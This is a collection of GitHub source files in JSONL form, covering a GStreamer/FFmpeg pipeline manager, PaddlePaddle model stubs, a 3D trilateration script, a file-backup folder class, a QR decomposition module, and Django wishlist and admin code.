pipeline_name=='CONTINUITY':\n\t\t\t#self.pill2kill.set()\n\t\t\tself.CONTINUITY.suicide()\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\tself.log_message(\"[WARNING] Gstreamer Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\n\t\t#for ffmpeg pipelines, we need to kill the process and next one too? FIXME\n\t\telif 'pipeline_type' in self.pipelines_desc[pipeline_number]['pipeline_settings'] and self.pipelines_desc[pipeline_number]['pipeline_settings']['pipeline_type']=='ffmpeg':\n\t\t\tself.log_message(\"[WARNING] FFmpeg Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\t\t\tsubprocess.call(\"kill -9 \"+str(self.pipelines_desc[pipeline_number]['pid']), shell=True)\n\t\t\tsubprocess.call(\"kill -9 \"+str(self.pipelines_desc[pipeline_number]['pid']+1), shell=True)\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\t\n\t\telse:\n\t\t\tself.pipelines[pipeline_number].set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelines[pipeline_number]=None\n\t\t\tself.busses[pipeline_number]=None\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\tself.log_message(\"[WARNING] Gstreamer Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\n\t\t#delete gstreamer graph if any\n\t\ttry:\n\t\t\tprint('MIXTER LOG: trying to delete graph')\n\t\t\tself.log_message(\"[DEBUG] trying to delete graph\")\n\t\t\tsubprocess.call('rm '+self.loaded_settings['gst_graph_path']+'p_'+str(pipeline_number)+'*', shell=True)\n\t\texcept:\n\t\t\tpass\n\n\tdef kill_all_pipelines(self):\n\t\tprint('MIXTER LOG: trying to kill all pipelines')\n\t\tself.log_message(\"[WARNING] Pipelines: trying to kill all pipelines\")\n\n\t\tfor n in list(self.pipelines_desc):\n\t\t\tself.kill_pipeline(n)\n\n\n\tdef reconnect(self,pipeline_number=0):\n\t\t#self.log_message(\"[DEBUG] Reconnect \" + str(self.pipelines[pipeline_number].get_name()))\n\t\t#self.kill_ffmpeg()\n\t\ttime.sleep(.5)\n\t\tpipeline_text = self.pipelines_desc[pipeline_number]['pipeline_text']\n\t\tpipeline_settings = self.pipelines_desc[pipeline_number]['pipeline_settings']\n\t\ttry:\n\t\t\tself.pipelines[pipeline_number].set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelines[pipeline_number]=None\n\t\t\tself.busses[pipeline_number]=None\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\texcept:\n\t\t\tprint('MIXTER LOG: Reconnect GST failure: is there any gstreamer pipeline?')\n\t\t\tself.log_message(\"[ERROR] Reconnect GST failure: is there any gstreamer pipeline?\")\n\t\t\n\t\ttry:\n\t\t\tself.pipelineRTMP.set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelineRTMP=None\n\t\texcept:\n\t\t\tpass\t\n\n\t\tself.busses[pipeline_number]=None\n\t\tprint('MIXTER LOG: Reconnect: executing build_pipeline')\n\t\tself.log_message(\"[WARNING] Reconnect: executing build_pipeline\")\n\t\tself.build_pipeline(pipeline_text,pipeline_settings)\n\n#################################\t\n# New methods\t\t\t\t\t#\n#\t\t\t \t\t\t#\n#################################\n\n\tdef dot_to_png(self,pipeline_id):\n\t\ttry:\n\t\t\tprint('MIXTER LOG: trying to convert .dot to .png')\n\t\t\tself.log_message(\"[DEBUG] trying to convert .dot to .png\")\n\t\t\tsubprocess.call('dot -Tpng -o '+self.loaded_settings['gst_graph_path']+pipeline_id+'.png '+self.loaded_settings['gst_graph_path']+pipeline_id+'.dot', shell=True)\n\t\texcept:\n\t\t\tpass\n\n\tdef be_loop(self):\n\t\t#self.disconnect_pipeline()\n\t\t#Mixter()\n\t\tGtk.main()\n\nGObject.threads_init()\nGst.init(None)\n","repo_name":"sporteiro/mixter","sub_path":"mixter.py","file_name":"mixter.py","file_ext":"py","file_size_in_byte":30786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"74292883715","text":"from __future__ import annotations\n\nfrom typing import Any\n\nfrom ... import Tensor, nn\nfrom ..ops import ConvNormActivation as ConvNormActivation\n\nclass InceptionStem(nn.Layer):\n conv_1a_3x3: Any = ...\n conv_2a_3x3: Any = ...\n conv_2b_3x3: Any = ...\n max_pool: Any = ...\n conv_3b_1x1: Any = ...\n conv_4a_3x3: Any = ...\n def __init__(self) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionA(nn.Layer):\n branch1x1: Any = ...\n branch5x5_1: Any = ...\n branch5x5_2: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any, pool_features: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionB(nn.Layer):\n branch3x3: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3: Any = ...\n branch_pool: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionC(nn.Layer):\n branch1x1: Any = ...\n branch7x7_1: Any = ...\n branch7x7_2: Any = ...\n branch7x7_3: Any = ...\n branch7x7dbl_1: Any = ...\n branch7x7dbl_2: Any = ...\n branch7x7dbl_3: Any = ...\n branch7x7dbl_4: Any = ...\n branch7x7dbl_5: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any, channels_7x7: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionD(nn.Layer):\n branch3x3_1: Any = ...\n branch3x3_2: Any = ...\n branch7x7x3_1: Any = ...\n branch7x7x3_2: Any = ...\n branch7x7x3_3: Any = ...\n branch7x7x3_4: Any = ...\n branch_pool: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionE(nn.Layer):\n branch1x1: Any = ...\n branch3x3_1: Any = ...\n branch3x3_2a: Any = ...\n branch3x3_2b: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3a: Any = ...\n branch3x3dbl_3b: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionV3(nn.Layer):\n num_classes: Any = ...\n with_pool: Any = ...\n layers_config: Any = ...\n inception_stem: Any = ...\n inception_block_list: Any = ...\n avg_pool: Any = ...\n dropout: Any = ...\n fc: Any = ...\n def __init__(\n self,\n num_classes: int = ...,\n with_pool: bool = ...,\n ) -> None: ...\n def forward(self, x: Tensor) -> Tensor: ...\n __call__ = forward\n\ndef inception_v3(\n pretrained: bool = ...,\n *,\n num_classes: int = ...,\n with_pool: bool = ...,\n) -> InceptionV3: ...\n","repo_name":"cattidea/paddlepaddle-stubs","sub_path":"paddle-stubs/vision/models/inceptionv3.pyi","file_name":"inceptionv3.pyi","file_ext":"pyi","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
+{"seq_id":"24078078607","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom mpmath import mp\nimport matplotlib.colors as mcolors\n\n\ndef Trilateration_3D(towers, distances):\n \"\"\"\n This program implements trilateration in 3 dimensions.\n It aims to determine the position of a point (posi) in space based on the\n position (coordinates) of P points in space and the distance\n from the unknown point to these known points.\n\n This implementation is a Cartesian 'true-range multilateration'.\n By using the first point and the Pythagorean theorem, we can calculate the distances\n between posi and the centers of the spheres.\n \"\"\"\n\n positions = []\n num_towers = len(towers)\n\n for i in range(num_towers - 3):\n # Select a subset of 4 towers\n towers_subset = towers[i:i + 4]\n distances_subset = distances[i:i + 4]\n\n # coordinates: p1 = [x, y, z] and radii.\n p = []\n for j in range(len(towers_subset)):\n p.append(np.array(towers_subset[j][:3], dtype=np.longdouble))\n r = np.array(distances_subset, dtype=np.longdouble)\n\n d, i_vals, j_vals, e_x, e_y, e_z = [], [], [], [], [], []\n for k in range(len(towers_subset) - 3):\n # the Euclidean distance between p[k + 1] and p[k]\n d.append(np.linalg.norm(p[k + 1] - p[k]).astype(np.longdouble))\n # the unit vector e_x in the direction from p1 to p2.\n e_x.append((p[k + 1] - p[k]) / np.linalg.norm(p[k + 1] - p[k]).astype(np.longdouble))\n # the projection of the vector from p[k + 2] to p[k] onto the e_x vector.\n i_vals.append(np.dot(e_x[k], (p[k + 2] - p[k])).astype(np.longdouble))\n # the unit vector e_y: subtracting the component of the vector from p[k] to p[k + 2] that lies along e_x\n e_y.append((p[k + 2] - p[k] - (i_vals[k] * e_x[k])) / np.linalg.norm(\n p[k + 2] - p[k] - (i_vals[k] * e_x[k])).astype(np.longdouble))\n # the projection of the vector from p[k + 2] to p[k] onto the e_y vector.\n j_vals.append(np.dot(e_y[k], (p[k + 2] - p[k])).astype(np.longdouble))\n # the cross product of the e_x and e_y vectors, resulting in the orthogonal unit vector e_z.\n e_z.append(np.cross(e_x[k], e_y[k]).astype(np.longdouble))\n\n x, y, z1, z2 = [], [], [], []\n for k in range(len(towers_subset) - 3):\n x_val = ((r[k] ** 2) - (r[k + 1] ** 2) + (d[k] ** 2)) / (2 * d[k])\n x.append(x_val.astype(np.longdouble))\n # calculates the x-coordinate of the trilaterated point based on the distances and radii.\n y_val = (((r[k] ** 2) - (r[k + 2] ** 2) + (i_vals[k] ** 2) + (j_vals[k] ** 2)) / (2 * j_vals[k])) - (\n (i_vals[k] / j_vals[k]) * x_val)\n y.append(y_val.astype(np.longdouble))\n # calculates the y-coordinate of the trilaterated point based on the distances,radii, and projection values.\n z1.append(np.sqrt(np.abs(r[k] ** 2 - x_val ** 2 - y_val ** 2)).astype(np.longdouble))\n # calculates the positive z-coordinate of the trilaterated point based on the distances, radii, and the x\n # and y coordinates. It uses the Pythagorean theorem to find the z-coordinate.\n z2.append((z1[k] * (-1)).astype(np.longdouble))\n # calculates the negative z-coordinate by multiplying the positive z-coordinate z1 with (-1), because\n # trilateration can have two possible solutions in 3D space, and\n # the negative value represents the other solution.\n\n ans1, ans2, dist1, dist2 = [], [], [], [] # ans1 is the first ansatz\n for k in range(len(towers_subset) - 3):\n # the first possible trilaterated point is calculated by summing the reference point p[k] with the\n # respective components along the x, y, and z axes. The values x[k], y[k], and z1[k] are multiplied by their\n # respective unit vectors e_x[k], e_y[k], and e_z[k], and the results are added together.\n ans1.append((p[k] + (x[k] * e_x[k]) + (y[k] * e_y[k]) + (z1[k] * e_z[k])).astype(np.longdouble))\n ans2.append((p[k] + (x[k] * e_x[k]) + (y[k] * e_y[k]) + (z2[k] * e_z[k])).astype(np.longdouble))\n # the distance between the four Point and the calculated one from ans1 and ans2.\n dist1.append(np.linalg.norm(p[k + 3] - ans1[k]).astype(np.longdouble))\n dist2.append(np.linalg.norm(p[k + 3] - ans2[k]).astype(np.longdouble))\n\n mean_positions = np.mean(ans1, axis=0, dtype=np.longdouble)\n\n # Append the calculated position to the list of positions\n positions.append(mean_positions)\n\n return positions\n\n\nif __name__ == \"__main__\":\n\n # import TowersAndConstants, TDOASimulation and SolveFunctions Modules from main\n # we have now the distance from each Tower to the estimated Transmitter position\n from main import *\n tx = fnc\n distances = distancesToEstimatedTransmitterPosition\n noise = 1e-3\n distances += np.random.normal(loc=0, scale=noise, size=number_towers)\n locations = []\n\n # Print out the data\n print(\"The input points, in the format of [x, y, z], are:\")\n for i, (tower, distance) in enumerate(zip(towers, distances)):\n print(f\"Tower {i + 1}: {tower} Distance: {distance}\")\n\n positions = Trilateration_3D(towers, distances)\n\n positions_array = np.array(positions, dtype=np.longdouble)\n\n # Check if z coordinate is negative and if so, make it positive\n if (positions_array[:, 2] < 0).any():\n positions_array[:, 2] = np.abs(positions_array[:, 2])\n\n def format_positions(posi, decimal_places):\n formatted_values = [\n (\"[{}]\".format(\", \".join([\"{:.{}f}\".format(np.longdouble(x), decimal_places) for x in pos.tolist()])))\n for pos in posi\n ]\n return formatted_values\n\n formatted_positions = []\n for pos in positions_array:\n pos_formatted = [np.format_float_scientific(x, unique=False, precision=precision) for x in pos]\n formatted_positions.append(pos_formatted)\n\n original_location = np.array(tx)\n\n positions_array = positions_array.astype(np.longdouble)\n for pos in formatted_positions:\n print(\"Position: {}\".format(pos))\n #print(\"Mean of the positions: {}\".format(mean_position_formatted))\n\n error_list = []\n for i, position in enumerate(formatted_positions):\n mp.dps = precision\n np.set_printoptions(precision=precision)\n current_position_mpf = np.array(position, dtype=np.longdouble)\n\n # Calculate axis-wise differences (absolute values)\n result_mpf = [abs(current_position_mpf[j] - tx[j]) for j in range(3)]\n mean_error_tri = np.mean(result_mpf)\n error_list.append(mean_error_tri)\n\n # Now, error_list contains the absolute differences between each component of current_position_mpf and tx, axis-wise\n print(\"absolute_mean_array_error: {}\".format(error_list))\n\n # Extract the z-coordinates for color mapping\n z_coordinates = positions_array[:, 2]\n\n # Create a figure and axis\n fig, ax = plt.subplots(figsize=(8, 8))\n # Plot the positions_array data with color mapping based on z-coordinate\n scatter = ax.scatter(positions_array[:, 0], positions_array[:, 1], c=z_coordinates, cmap='viridis',\n\n label='Positionen')\n\n # Plot the literature value tx\n ax.scatter(tx[0], tx[1], c='r', marker='x', label='tx')\n\n # Set labels and title\n ax.set_xlabel('X-Achse')\n ax.set_ylabel('Y-Achse')\n ax.set_title('Visualisierung der Positionen mit tx')\n\n # Create a custom colorbar\n color_map = plt.cm.ScalarMappable(cmap='viridis',\n norm=mcolors.Normalize(vmin=min(z_coordinates), vmax=max(z_coordinates)))\n color_map.set_array(z_coordinates)\n cbar = plt.colorbar(color_map, ax=ax)\n num_ticks = 10\n cbar.set_ticks(np.linspace(min(z_coordinates), max(z_coordinates), num_ticks))\n cbar.set_ticklabels([f'{x:.12f}' for x in np.linspace(min(z_coordinates), max(z_coordinates), num_ticks)])\n\n cbar.set_label('Z-Achse')\n\n # Highlight tx value on the colorbar\n cbar.ax.scatter(0.5, tx[2], c='r', marker='x', label='tx')\n ax.grid(which='major', color='#DDDDDD', linewidth=0.8)\n ax.grid(which='minor', color='#EEEEEE', linestyle=':', linewidth=0.5)\n ax.minorticks_on()\n\n ax.legend()\n plt.show()\n\n \"\"\"\n Fit Kurve\n \"\"\"\n def linear_model(x, a, b):\n return a * x + b\n\n # Fit the data using the custom exponential model with weights\n params_tri, _ = curve_fit(linear_model, len(error_list), error_list, method='lm')\n\n # Generate x-values for the plot\n x = np.linspace(4, number_towers, 70)\n\n # Compute the fitted curve using the optimized parameters\n fit_curve_tri = linear_model(x, params_tri[0], params_tri[1])\n\n # Plot the original data and the fitted curve\n fig, ax = plt.subplots(figsize=(14, 8))\n l = np.array(range(4, number_towers + 1))\n ax.scatter(l, error_list, label='error_tri', s=30, c='r', marker='o')\n\n plt.xlabel('Number of Towers')\n plt.ylabel('Error')\n\n ax.set_yscale('asinh')\n\n # Create a secondary y-axis\n ax2 = ax.twinx()\n\n # Plot the fitted curve with a different y-axis limit\n ax2.plot(x, fit_curve_tri, color='black', label='Fitted Curve (tri)')\n ax2.set_ylabel('Fitted Curve')\n\n # Combine the legends of both plots\n handles, labels = ax.get_legend_handles_labels()\n handles2, labels2 = ax2.get_legend_handles_labels()\n ax.legend(handles + handles2, labels + labels2)\n\n text_x = number_towers * 0.5 # x-coordinate for the text annotation\n text_y = ax.get_ylim()[1] * 1.03 # y-coordinate for the text annotation\n a_value = params_tri[0]\n text = f'a = {a_value}'\n ax.text(text_x, text_y, text, fontsize=12, ha='center')\n\n plt.show()\n","repo_name":"Mem314/Multilateration","sub_path":"trilateration.py","file_name":"trilateration.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10224982114","text":"from __future__ import annotations\n\nimport json\nimport time\nfrom pathlib import Path\nfrom typing import Union\n\nfrom errors import UnableToAccessException\nfrom records.base_record import BaseRecord\nfrom records.file import File\n\n\nclass Folder(BaseRecord):\n \"\"\"\n Folder class\n Represents folder in a filesystem in a form of an instance\n Inherits from BaseRecord class\n\n Stores information about the file\n Attributes:\n handler handler to manipulate a real file\n modified last time of a file\n size size of a file\n id unique id of a record\n base_location needed to know the relative and absolute path\n \"\"\"\n\n def __init__(self, path, handler, base_path=None, stat: dict = None):\n super().__init__()\n path_obj = Path(path)\n\n self.handler = handler\n self.path = path\n\n self.base_location = base_path\n self.name = path_obj.name\n self.children = dict()\n\n self.set_stat(stat)\n\n def set_stat(self, stat: dict = None) -> None:\n if not stat:\n stat = self.handler.get_folder_stat(self.path)\n\n self.id = stat.get(\"id\")\n self.size = stat.get(\"size\")\n self.modified = stat.get(\"modified\")\n\n def add_child(self, record: Union[Folder, File]):\n \"\"\"\n Adds the child records to the folder structure\n :param record: Folder or File object instance\n :return: None\n \"\"\"\n self.children[record.path] = record\n\n def set_content(self):\n \"\"\"\n Recursively adds children to self and nested folders\n :return: None\n \"\"\"\n content = self.handler.get_folder_content(self)\n for record in content:\n self.add_child(record)\n if isinstance(record, Folder):\n record.set_content()\n\n def copy(self, remote_location, remote_handler, with_content=False) -> Folder:\n \"\"\"\n Copies the folder into a remote location\n Uses remote handler to create and store file\n\n If specified copies all the content of the folder\n\n :param remote_location: remote path used to save a folder\n :param remote_handler: remote handler to handle folder creation\n :param with_content: whether to copy folder contents\n :return: newly created folder\n \"\"\"\n new_folder = remote_handler.upload_folder(self, remote_location, with_content)\n return new_folder\n\n def get_structure(self) -> dict:\n \"\"\"\n Gets the file structure of the folder recursively\n\n :return: file structure dictionary\n \"\"\"\n structure = dict()\n structure[self.path] = dict()\n structure[self.path][\"data\"] = self.get_dict()\n children = []\n\n for path, record in self.children.items():\n if isinstance(record, Folder):\n children.append(record.get_structure())\n else:\n children.append(record.get_dict())\n structure[self.path][\"children\"] = children\n return structure\n\n def dump_structure(self, save_folder: Folder = None) -> File:\n if not save_folder:\n save_folder = self\n structure = self.get_structure()\n structure_encoded = json.dumps(structure, indent=4, ensure_ascii=False).encode(\"utf-8\")\n\n file = save_folder.handler.upload_structure(save_folder, structure_encoded)\n\n return file\n\n def __str__(self):\n return f\"Type: Folder\\n\" \\\n f\"Lctn: {self.path}\\n\" \\\n f\"Name: {self.name}\\n\" \\\n f\"Size: {self.size}\\n\" \\\n f\"Modf: {self.modified}\\n\" \\\n f\"Id: {self.id}\\n\"\n","repo_name":"Denis-Source/file_backup","sub_path":"records/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25244048417","text":"import LA\r\n\r\ndef normalize(vector: list) -> list:\r\n '''Normalizes the input vector. The norm of the input vector is found using\r\n p_norm. Then the input vector is then multiplied by 1/norm. The result and \r\n norm are then returned.\r\n\r\n Arguments:\r\n vector: A vector stored as a list contanining real/complex numbers.\r\n\r\n Returns:\r\n The normalized input vector and norm of the input vector.\r\n '''\r\n norm: float = LA.p_norm(vector)\r\n result: list = LA.sca_vec_mult(1/norm,vector)\r\n\r\n return [result,norm]\r\n\r\n\r\ndef orthagonalize(vector: list, basis: list) -> list:\r\n '''Orthagonalizes the input vector rejection of input vector on input basis\r\n vector. Using inner_product the inner product of the input vector and input\r\n basis and stored as product. The product is then used as a scalar to find \r\n the negated vector projection of the input vector on the input basis using\r\n sca_vec_mult and subtracted from the input vector, stored as \r\n negated_projection. Then using add_vectors add the input vector and the \r\n negated_projection, stored as result. The result and product is returned.\r\n\r\n Arguments:\r\n vector: A vector stored as a list.\r\n basis: A second vector stored as a list.\r\n Returns:\r\n The orthagonalized input vector and the inner product of the input\r\n vector and input basis vector.\r\n '''\r\n product: complex = LA.inner_product(vector,basis)\r\n negated_projection: list[complex] = LA.sca_vec_mult(-1*product,basis)\r\n result: list[complex] = LA.add_vectors(vector,negated_projection)\r\n\r\n return [result,product]\r\n\r\ndef stable_gram_schmidt(matrix: list) -> list:\r\n '''Uses the Modified Gram-Schmidt formula to find the reduced QR \r\n factorization of the input matrix.\r\n First, initialize matrix Q to be a copy of the input matrix and matrix R to\r\n be a 0 matrix. Then, iterate over every column vector in matrix Q. \r\n Normalize the vector and store the normalization in matrix R. Then, \r\n orthagonalize every following vector in matrix Q corresponding to the current\r\n column that is being evaluated, stored as matrix R. Returning the matrices \r\n Q and R.\r\n Arguments:\r\n matrix: A matrix stored as a list of lists.\r\n Returns:\r\n The orthonormal matrix, Q of the input matrix and the upper triangular \r\n matrix, R fo the input matrix.\r\n '''\r\n Q: list = [column[:] for column in matrix]\r\n R: list = [[0 for m in matrix] for n in matrix]\r\n \r\n for element, vector in enumerate(Q):\r\n normalize_operation = normalize(vector)\r\n Q[element] = normalize_operation[0]\r\n R[element][element] = normalize_operation[1]\r\n for index, orthagonal_vector in enumerate(Q[element+1:],start=element+1):\r\n orthagonal_operation = orthagonalize(orthagonal_vector,vector)\r\n Q[index] = orthagonal_operation[0]\r\n R[index][element] = orthagonal_operation[1]\r\n\r\n return [Q,R]\r\n\r\ndef orthonormal(matrix: list) -> list:\r\n \"\"\"Finds the orthonormal list of vectors(or lists) of the input matrix. \r\n Uses stable_gram_schmidt and returns Q of the QR factorization and stored\r\n as a list of vectors(or lists) in result. The result is then returned.\r\n Arguments:\r\n matrix: A matrix stored as a list of vectors(or lists).\r\n Returns:\r\n An orthonormal matrix with the same span as the input matrix\r\n \"\"\"\r\n result: list = stable_gram_schmidt(matrix)[0]\r\n return result\r\n","repo_name":"Chase-Stearns/Math_3430_Fall_2021","sub_path":"QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35590296758","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import WishListOrderItem, WishListOrder\nfrom account.models import Profile\nfrom shop.models import Product,Category \nfrom cart.views import generate_order_id\nfrom django.contrib import messages\nfrom django.urls import reverse\n\n\ndef get_user_pending(request):\n # get order for the correct user\n if request.user.is_authenticated:\n user_profile = get_object_or_404(Profile, user=request.user)\n order = WishListOrder.objects.filter(owner=user_profile, is_ordered=False)\n if order.exists():\n # get the only order in the list of filtered orders\n return order[0]\n return 0\n else:\n return \" \" \n\n\ndef add_to_wishlist(request, **kwargs):\n \n # get the user profile\n user_profile = get_object_or_404(Profile, user=request.user)\n # filter products by id\n product = Product.objects.filter(id=kwargs.get('item_id', \"\")).first()\n # check if the user already owns this product\n if product in request.user.profile.product.all():\n messages.info(request, 'You already added this product')\n return redirect(reverse('shop-list')) \n # create orderItem of the selected product\n\n order_item, status = WishListOrderItem.objects.get_or_create(product=product)\n # create order associated with the user\n user_order, status = WishListOrder.objects.get_or_create(owner=user_profile, is_ordered=False)\n user_order.items.add(order_item)\n if status:\n # generate a reference code\n user_order.ref_code = generate_order_id()\n user_order.save()\n\n # show confirmation message and redirect back to the same page\n messages.info(request, \"item added to wishlist\")\n return redirect(reverse('shop-list'))\n \n context = {\n \n }\n\n return render(request, template, context) \n\n\n\ndef delete_from_wishlist(request, item_id):\n item_to_delete = WishListOrderItem.objects.filter(pk=item_id)\n if item_to_delete.exists():\n item_to_delete[0].delete()\n messages.info(request, \"Item has been deleted\")\n return redirect(reverse('wishlist:wishlist'))\n\ndef wishlist(request, **kwargs):\n\n template = 'wishlist/wishlist.html'\n category = Category.objects.all()\n eo = get_user_pending(request)\n context = {\n\n 'categories': category,\n 'eo': eo\n\n }\n return render(request, template, context)\n\n \n\n\n\n \n","repo_name":"Mulelur/smartmallo","sub_path":"wishlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29031345015","text":"\"\"\"\nDjango admin models for openassessment\n\"\"\"\nimport json\n\nfrom django.contrib import admin\nfrom django.core.urlresolvers import reverse\nfrom django.utils import html\n\nfrom openassessment.assessment.models import (\n Assessment, AssessmentFeedback, PeerWorkflow, PeerWorkflowItem, Rubric,\n AIGradingWorkflow, AITrainingWorkflow, AIClassifierSet, AIClassifier\n)\nfrom openassessment.assessment.serializers import RubricSerializer\n\n\nclass RubricAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for Rubrics.\n \"\"\"\n list_per_page = 20 # Loads of criteria summary are moderately expensive\n\n list_display = ('id', 'content_hash', 'criteria_summary')\n list_display_links = ('id', 'content_hash')\n search_fields = ('id', 'content_hash')\n readonly_fields = (\n 'id', 'content_hash', 'structure_hash',\n 'points_possible', 'criteria_summary', 'data'\n )\n\n def criteria_summary(self, rubric_obj):\n \"\"\"Short description of criteria for presenting in a list.\"\"\"\n rubric_data = RubricSerializer.serialized_from_cache(rubric_obj)\n return u\", \".join(\n u\"{} - {}: {}\".format(criterion[\"name\"], criterion['label'], criterion[\"points_possible\"])\n for criterion in rubric_data[\"criteria\"]\n )\n\n def data(self, rubric_obj):\n \"\"\"Full JSON string of rubric, indented and HTML formatted.\"\"\"\n rubric_data = RubricSerializer.serialized_from_cache(rubric_obj)\n return u\"\\n{}\\n\".format(\n html.escape(json.dumps(rubric_data, sort_keys=True, indent=4))\n )\n data.allow_tags = True\n\n\nclass PeerWorkflowItemInline(admin.StackedInline):\n \"\"\"\n Django admin model for PeerWorkflowItems.\n \"\"\"\n model = PeerWorkflowItem\n fk_name = 'author'\n raw_id_fields = ('author', 'scorer', 'assessment')\n extra = 0\n\n\nclass PeerWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for PeerWorkflows.\n \"\"\"\n list_display = (\n 'id', 'student_id', 'item_id', 'course_id', 'submission_uuid',\n 'created_at', 'completed_at', 'grading_completed_at',\n )\n search_fields = (\n 'id', 'student_id', 'item_id', 'course_id', 'submission_uuid',\n )\n inlines = (PeerWorkflowItemInline,)\n\n\nclass AssessmentAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for Assessments.\n \"\"\"\n list_display = (\n 'id', 'submission_uuid', 'score_type', 'scorer_id', 'scored_at',\n 'rubric_link',\n )\n search_fields = (\n 'id', 'submission_uuid', 'score_type', 'scorer_id', 'scored_at',\n 'rubric__content_hash',\n )\n readonly_fields = (\n 'submission_uuid', 'rubric_link', 'scored_at', 'scorer_id',\n 'score_type', 'points_earned', 'points_possible', 'feedback',\n 'parts_summary',\n )\n exclude = ('rubric', 'submission_uuid')\n\n def rubric_link(self, assessment_obj):\n \"\"\"\n Returns the rubric link for this assessment.\n \"\"\"\n url = reverse(\n 'admin:assessment_rubric_change',\n args=[assessment_obj.rubric.id]\n )\n return u'{}'.format(\n url, assessment_obj.rubric.content_hash\n )\n rubric_link.allow_tags = True\n rubric_link.admin_order_field = 'rubric__content_hash'\n rubric_link.short_description = 'Rubric'\n\n def parts_summary(self, assessment_obj):\n \"\"\"\n Returns the parts summary of this assessment as HTML.\n \"\"\"\n return \"
\".join(\n html.escape(\n u\"{}/{} - {} - {}: {} - {} - {}\".format(\n part.points_earned,\n part.points_possible,\n part.criterion.name,\n part.criterion.label,\n part.option.name if part.option else \"None\",\n part.option.label if part.option else \"None\",\n part.feedback,\n )\n )\n for part in assessment_obj.parts.all()\n )\n parts_summary.allow_tags = True\n\n\nclass AssessmentFeedbackAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AssessmentFeedbacks.\n \"\"\"\n list_display = ('id', 'submission_uuid',)\n search_fields = ('id', 'submission_uuid',)\n readonly_fields = (\n 'submission_uuid', 'assessments_by', 'options', 'feedback_text'\n )\n exclude = ('assessments',)\n\n def assessments_by(self, assessment_feedback):\n \"\"\"\n Gets all assessments for this feedback.\n \"\"\"\n links = [\n u'{}'.format(\n reverse('admin:assessment_assessment_change', args=[asmt.id]),\n html.escape(asmt.scorer_id)\n )\n for asmt in assessment_feedback.assessments.all()\n ]\n return \", \".join(links)\n assessments_by.allow_tags = True\n\n\nclass AIGradingWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AIGradingWorkflows.\n \"\"\"\n list_display = ('uuid', 'submission_uuid')\n search_fields = ('uuid', 'submission_uuid', 'student_id', 'item_id', 'course_id')\n readonly_fields = ('uuid', 'submission_uuid', 'student_id', 'item_id', 'course_id')\n\n\nclass AITrainingWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AITrainingWorkflows.\n \"\"\"\n list_display = ('uuid',)\n search_fields = ('uuid', 'course_id', 'item_id',)\n readonly_fields = ('uuid', 'course_id', 'item_id',)\n\n\nclass AIClassifierInline(admin.TabularInline):\n \"\"\"\n Django admin model for AIClassifiers.\n \"\"\"\n model = AIClassifier\n\n\nclass AIClassifierSetAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AICLassifierSets.\n \"\"\"\n list_display = ('id',)\n search_fields = ('id',)\n inlines = [AIClassifierInline]\n\n\nadmin.site.register(Rubric, RubricAdmin)\nadmin.site.register(PeerWorkflow, PeerWorkflowAdmin)\nadmin.site.register(Assessment, AssessmentAdmin)\nadmin.site.register(AssessmentFeedback, AssessmentFeedbackAdmin)\nadmin.site.register(AIGradingWorkflow, AIGradingWorkflowAdmin)\nadmin.site.register(AITrainingWorkflow, AITrainingWorkflowAdmin)\nadmin.site.register(AIClassifierSet, 